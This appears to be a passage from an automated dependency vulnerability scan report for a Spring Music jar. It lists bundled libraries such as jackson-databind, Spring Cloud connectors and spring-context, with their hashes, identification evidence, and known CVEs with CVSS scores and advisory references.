CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2022-42003
In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2022-42004
In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
OSSINDEX - [CVE-2022-42004] CWE-502: Deserialization of Untrusted Data
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42004
OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/3582
Vulnerable Software & Versions:
CVE-2018-1000873
FasterXML Jackson versions before 2.9.8 contain a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in a denial of service (DoS). The attack appears to be exploitable when the victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2019-12384
FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2019-12814
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-35116
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.0/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar
Description: Spring Cloud Connectors Cloud Foundry Connector
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar
MD5: 96180bb747a2db14684576adc81d6a82
SHA1: d723add3f7cd620235bb4b994551bb66fe9cffa0
SHA256: c913a8554214e9c24e3b58fbb6d9e4c6605518f510ea90cd7ae03a0ed5b15f41
Evidence (Type | Source | Name | Value | Confidence)
Vendor | central | artifactid | spring-cloud-cloudfoundry-connector | Highest
Vendor | central | groupid | org.springframework.cloud | Highest
Vendor | file | name | spring-cloud-cloudfoundry-connector | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | cloud | Low
Vendor | jar | package name | cloudfoundry | Low
Vendor | jar | package name | springframework | Low
Vendor | pom | artifactid | spring-cloud-cloudfoundry-connector | Low
Vendor | pom | developer id | ramnivas | Medium
Vendor | pom | developer name | Ramnivas Laddad | Medium
Vendor | pom | groupid | org.springframework.cloud | Highest
Vendor | pom | name | Spring Cloud Connectors Cloud Foundry Connector | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | http://projects.spring.io/spring-cloud | Medium
Vendor | pom | url | spring-projects/spring-cloud | Highest
Product | central | artifactid | spring-cloud-cloudfoundry-connector | Highest
Product | file | name | spring-cloud-cloudfoundry-connector | High
Product | jar | package name | cloud | Low
Product | jar | package name | cloudfoundry | Low
Product | jar | package name | com | Low
Product | pom | artifactid | spring-cloud-cloudfoundry-connector | Highest
Product | pom | developer id | ramnivas | Low
Product | pom | developer name | Ramnivas Laddad | Low
Product | pom | groupid | org.springframework.cloud | Highest
Product | pom | name | Spring Cloud Connectors Cloud Foundry Connector | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | http://projects.spring.io/spring-cloud | Low
Product | pom | url | spring-projects/spring-cloud | High
Version | central | version | 2.0.1.RELEASE | Highest
Version | pom | version | 2.0.1.RELEASE | Highest
CVE-2016-5006
The Cloud Controller in Cloud Foundry before 239 logs user-provided service objects at creation, which allows attackers to obtain sensitive user credential information via unspecified vectors. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2016-6637
Multiple cross-site request forgery (CSRF) vulnerabilities in Pivotal Cloud Foundry (PCF) before 242; UAA 2.x before 2.7.4.7, 3.x before 3.3.0.5, and 3.4.x before 3.4.4; UAA BOSH before 11.5 and 12.x before 12.5; Elastic Runtime before 1.6.40, 1.7.x before 1.7.21, and 1.8.x before 1.8.2; and Ops Manager 1.7.x before 1.7.13 and 1.8.x before 1.8.1 allow remote attackers to hijack the authentication of unspecified victims for requests that approve or deny a scope via a profile or authorize approval page. CWE-352 Cross-Site Request Forgery (CSRF)
CVSSv3: Base Score: CRITICAL (9.6) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2016-4468
SQL injection vulnerability in Pivotal Cloud Foundry (PCF) before 238; UAA 2.x before 2.7.4.4, 3.x before 3.3.0.2, and 3.4.x before 3.4.1; UAA BOSH before 11.2 and 12.x before 12.2; Elastic Runtime before 1.6.29 and 1.7.x before 1.7.7; and Ops Manager 1.7.x before 1.7.8 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2016-6651
The UAA /oauth/token endpoint in Pivotal Cloud Foundry (PCF) before 243; UAA 2.x before 2.7.4.8, 3.x before 3.3.0.6, and 3.4.x before 3.4.5; UAA BOSH before 11.7 and 12.x before 12.6; Elastic Runtime before 1.6.40, 1.7.x before 1.7.21, and 1.8.x before 1.8.2; and Ops Manager 1.7.x before 1.7.13 and 1.8.x before 1.8.1 allows remote authenticated users to gain privileges by leveraging possession of a token. CWE-264 Permissions, Privileges, and Access Controls
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2016-3084
The UAA reset password flow in Cloud Foundry release v236 and earlier versions, UAA release v3.3.0 and earlier versions, all versions of Login-server, UAA release v10 and earlier versions and Pivotal Elastic Runtime versions prior to 1.7.2 is vulnerable to a brute force attack due to multiple active codes at a given time. This vulnerability is applicable only when using the UAA internal user store for authentication. Deployments enabled for integration via SAML or LDAP are not affected. CWE-264 Permissions, Privileges, and Access Controls
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2016-6659
Cloud Foundry before 248; UAA 2.x before 2.7.4.12, 3.x before 3.6.5, and 3.7.x through 3.9.x before 3.9.3; and UAA bosh release (aka uaa-release) before 13.9 for UAA 3.6.5 and before 24 for UAA 3.9.3 allow attackers to gain privileges by accessing UAA logs and subsequently running a specially crafted application that interacts with a configured SAML provider. CWE-287 Improper Authentication
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2016-5016
Pivotal Cloud Foundry 239 and earlier, UAA (aka User Account and Authentication Server) 3.4.1 and earlier, UAA release 12.2 and earlier, PCF (aka Pivotal Cloud Foundry) Elastic Runtime 1.6.x before 1.6.35, and PCF Elastic Runtime 1.7.x before 1.7.13 does not validate if a certificate is expired. CWE-295 Improper Certificate Validation
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2016-6636
The OAuth authorization implementation in Pivotal Cloud Foundry (PCF) before 242; UAA 2.x before 2.7.4.7, 3.x before 3.3.0.5, and 3.4.x before 3.4.4; UAA BOSH before 11.5 and 12.x before 12.5; Elastic Runtime before 1.6.40, 1.7.x before 1.7.21, and 1.8.x before 1.8.1; and Ops Manager 1.7.x before 1.7.13 and 1.8.x before 1.8.1 mishandles redirect_uri subdomains, which allows remote attackers to obtain implicit access tokens via a modified subdomain. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-cloud-connectors-core-2.0.1.RELEASE.jar
Description: Spring Cloud Connectors Core
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-connectors-core-2.0.1.RELEASE.jar
MD5: dbb34ee8b5a2eb9bc6c52c1d8a0b1045
SHA1: 8aa0c1977cc592d475c56fdfedb2e79f0c026356
SHA256: 03b67f724c5fa181dfc786fcb744e06a35ef030a628d2007406c730f9d0591b8
Evidence (Type | Source | Name | Value | Confidence)
Vendor | central | artifactid | spring-cloud-connectors-core | Highest
Vendor | central | groupid | org.springframework.cloud | Highest
Vendor | file | name | spring-cloud-connectors-core | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | cloud | Low
Vendor | jar | package name | service | Low
Vendor | jar | package name | springframework | Low
Vendor | pom | artifactid | spring-cloud-connectors-core | Low
Vendor | pom | developer email | cschaefer@pivotal.io | Low
Vendor | pom | developer email | rladdad@gopivotal.com | Low
Vendor | pom | developer email | sfrederick@pivotal.io | Low
Vendor | pom | developer id | cschaefer | Medium
Vendor | pom | developer id | ramnivas | Medium
Vendor | pom | developer id | sfrederick | Medium
Vendor | pom | developer name | Chris Schaefer | Medium
Vendor | pom | developer name | Ramnivas Laddad | Medium
Vendor | pom | developer name | Scott Frederick | Medium
Vendor | pom | groupid | org.springframework.cloud | Highest
Vendor | pom | name | Spring Cloud Connectors Core | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | https://spring.io | Medium
Vendor | pom | url | http://projects.spring.io/spring-cloud | Highest
Product | central | artifactid | spring-cloud-connectors-core | Highest
Product | file | name | spring-cloud-connectors-core | High
Product | jar | package name | cloud | Low
Product | jar | package name | service | Low
Product | pom | artifactid | spring-cloud-connectors-core | Highest
Product | pom | developer email | cschaefer@pivotal.io | Low
Product | pom | developer email | rladdad@gopivotal.com | Low
Product | pom | developer email | sfrederick@pivotal.io | Low
Product | pom | developer id | cschaefer | Low
Product | pom | developer id | ramnivas | Low
Product | pom | developer id | sfrederick | Low
Product | pom | developer name | Chris Schaefer | Low
Product | pom | developer name | Ramnivas Laddad | Low
Product | pom | developer name | Scott Frederick | Low
Product | pom | groupid | org.springframework.cloud | Highest
Product | pom | name | Spring Cloud Connectors Core | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | https://spring.io | Low
Product | pom | url | http://projects.spring.io/spring-cloud | Medium
Version | central | version | 2.0.1.RELEASE | Highest
Version | pom | version | 2.0.1.RELEASE | Highest
spring-music-sqldb-1.0.jar: spring-cloud-spring-service-connector-2.0.1.RELEASE.jar
Description: Spring Cloud Connectors Spring Service Connectors
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-spring-service-connector-2.0.1.RELEASE.jar
MD5: c098887d14db24e752a8dfaf744d35f8
SHA1: 5a114c00eb26b68b88a8c8d1948cadbd8d24d634
SHA256: 37625da0a07fe04e19c249addef52c766445acac2283083429d51ccadd4ee6ac
Evidence (Type | Source | Name | Value | Confidence)
Vendor | central | artifactid | spring-cloud-spring-service-connector | Highest
Vendor | central | groupid | org.springframework.cloud | Highest
Vendor | file | name | spring-cloud-spring-service-connector | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | cloud | Low
Vendor | jar | package name | service | Low
Vendor | jar | package name | springframework | Low
Vendor | pom | artifactid | spring-cloud-spring-service-connector | Low
Vendor | pom | developer email | cschaefer@pivotal.io | Low
Vendor | pom | developer email | rladdad@gopivotal.com | Low
Vendor | pom | developer email | sfrederick@pivotal.io | Low
Vendor | pom | developer id | cschaefer | Medium
Vendor | pom | developer id | ramnivas | Medium
Vendor | pom | developer id | sfrederick | Medium
Vendor | pom | developer name | Chris Schaefer | Medium
Vendor | pom | developer name | Ramnivas Laddad | Medium
Vendor | pom | developer name | Scott Frederick | Medium
Vendor | pom | groupid | org.springframework.cloud | Highest
Vendor | pom | name | Spring Cloud Connectors Spring Service Connectors | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | https://spring.io | Medium
Vendor | pom | url | http://projects.spring.io/spring-cloud | Highest
Product | central | artifactid | spring-cloud-spring-service-connector | Highest
Product | file | name | spring-cloud-spring-service-connector | High
Product | jar | package name | cloud | Low
Product | jar | package name | service | Low
Product | pom | artifactid | spring-cloud-spring-service-connector | Highest
Product | pom | developer email | cschaefer@pivotal.io | Low
Product | pom | developer email | rladdad@gopivotal.com | Low
Product | pom | developer email | sfrederick@pivotal.io | Low
Product | pom | developer id | cschaefer | Low
Product | pom | developer id | ramnivas | Low
Product | pom | developer id | sfrederick | Low
Product | pom | developer name | Chris Schaefer | Low
Product | pom | developer name | Ramnivas Laddad | Low
Product | pom | developer name | Scott Frederick | Low
Product | pom | groupid | org.springframework.cloud | Highest
Product | pom | name | Spring Cloud Connectors Spring Service Connectors | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | https://spring.io | Low
Product | pom | url | http://projects.spring.io/spring-cloud | Medium
Version | central | version | 2.0.1.RELEASE | Highest
Version | pom | version | 2.0.1.RELEASE | Highest
spring-music-sqldb-1.0.jar: spring-context-5.0.5.RELEASE.jar
Description: Spring Context
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-context-5.0.5.RELEASE.jar
MD5: 0b5681097790036a3244012f825b60db
SHA1: 9cca4bf5acb693249a01c218f471c677b951d6e2
SHA256: 82dd82e805cdebf55103e4bcb67c85d766665ee33a15b7f4b033863477d26a1e
Evidence (Type | Source | Name | Value | Confidence)
Vendor | central | artifactid | spring-context | Highest
Vendor | central | groupid | org.springframework | Highest
Vendor | file | name | spring-context | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | context | Highest
Vendor | jar | package name | springframework | Low
Vendor | Manifest | automatic-module-name | spring.context | Medium
Vendor | pom | artifactid | spring-context | Low
Vendor | pom | developer email | jhoeller@pivotal.io | Low
Vendor | pom | developer id | jhoeller | Medium
Vendor | pom | developer name | Juergen Hoeller | Medium
Vendor | pom | groupid | org.springframework | Highest
Vendor | pom | name | Spring Context | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | http://projects.spring.io/spring-framework | Medium
Vendor | pom | url | spring-projects/spring-framework | Highest
Product | central | artifactid | spring-context | Highest
Product | file | name | spring-context | High
Product | hint analyzer | product | springsource_spring_framework | Highest
Product | jar | package name | context | Highest
Product | Manifest | automatic-module-name | spring.context | Medium
Product | Manifest | Implementation-Title | spring-context | High
Product | pom | artifactid | spring-context | Highest
Product | pom | developer email | jhoeller@pivotal.io | Low
Product | pom | developer id | jhoeller | Low
Product | pom | developer name | Juergen Hoeller | Low
Product | pom | groupid | org.springframework | Highest
Product | pom | name | Spring Context | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | http://projects.spring.io/spring-framework | Low
Product | pom | url | spring-projects/spring-framework | High
Version | central | version | 5.0.5.RELEASE | Highest
Version | Manifest | Implementation-Version | 5.0.5.RELEASE | High
Version | pom | version | 5.0.5.RELEASE | Highest
CVE-2022-22965
CISA Known Exploited Vulnerability: Product: VMware Spring Framework Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability Date Added: 2022-04-04 Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Required Action: Apply updates per vendor instructions. Due Date: 2022-04-25 Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - US_GOVERNMENT_RESOURCE security@vmware.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security@vmware.com - MITIGATION,VENDOR_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-1258
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258 OSSIndex - https://jira.spring.io/browse/SPR-16757 OSSIndex - https://pivotal.io/security/cve-2018-1258 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - 
THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-22259
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 (https://spring.io/security/cve-2024-22243), but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2018-11040
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040 OSSIndex - https://jira.spring.io/browse/SPR-16798 OSSIndex - https://pivotal.io/security/cve-2018-11040 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-15756
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
